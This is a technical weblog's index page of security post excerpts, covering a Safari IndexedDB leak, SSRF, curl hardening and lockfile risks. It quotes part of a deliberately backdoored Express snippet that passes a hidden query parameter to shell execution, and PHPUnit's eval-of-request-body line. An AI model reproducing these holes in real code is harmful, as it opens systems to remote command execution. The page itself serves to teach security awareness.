A rather geeky/technical weblog, est. 2001, by Bramus
There’s a pretty nasty exploit in Safari 15, where sites/tabs that interact with an IndexedDB database leak that name to other tabs. In Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API is violating the same-origin policy. Every time a website interacts with a database, a new (empty) …
Continue reading “Exploiting IndexedDB API information leaks in Safari 15”
Wolfgang Ettlinger carefull crafted this JavaScript snippet, which contains a backdoor. const express = require(‘express’); const util = require(‘util’); const exec = util.promisify(require(‘child_process’).exec); const app = express(); app.get(‘/network_health’, async (req, res) => { const { timeout,ㅤ} = req.query; const checkCommands = [ ‘ping -c 1 google.com’, ‘curl -s http://example.com/’,ㅤ ]; try { await Promise.all(checkCommands.map(cmd => …
Patrick Brosset created a handy website that dumps the UA Client Hints your browser sends. Might come in handy. My User Agent Client Hints → Over at web.dev you can find an article that introduces User-Agent Client Hints
Good post — with accompanying code — on PHP.Watch on how to tighten the almighty curl: Limit Curl Protocols Do not enable automatic redirects unless absolutely necessary If redirects are enabled enabled, limit allowed protocols (if different from #1 above) If redirects are enabled, set a strict limit Set a strict time-out Do not disable …
At the headquarters of Cloudflare, in San Francisco, there’s a wall of lava lamps: the Entropy Wall. They’re used to generate random numbers and keep a good bit of the internet secure: here’s how. How geeky! 🤩
The author of PHPUnit was a bit surprised when he received a mail stating that PHPUnit was a security risk and hackers could remotely execute PHP code through a file named eval-stdin.php that ships used to ship with PHPUnit. // eval-stdin.php eval ('?>'. \file_get_contents('php://input')); Even though the eval-stdin.php file itself indeed was vulnerable, it never …
When watching a diff that contains a lockfile (say: a yarn.lock for example) on GitHub, GitHub doesn’t always show the differences (see screenshot above) as the changes in such files tend to be quite big. And even if it were to show the changes, does one really take a close look into it? With this …
Continue reading “Beware when merging Pull Requests with a changed lockfile”
In this article, we will focus on the security side of the framework. We will be dividing the article into the following sections: Securing app to server connection Securing local data Advanced integrity checks Securing React Native Applications →
From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. …
Cool interactive site showing your how to perform a Server Side Request Forgery hack, based on a true incident: The following interactive tutorial is a reconstruction of Capital One’s data breach incident that exposed the records of almost 106 million customers. Paige Thompson is accused of breaking into a Capital One server and gaining access …
Continue reading “Learn about security by hacking a fake bank using a real hacking method”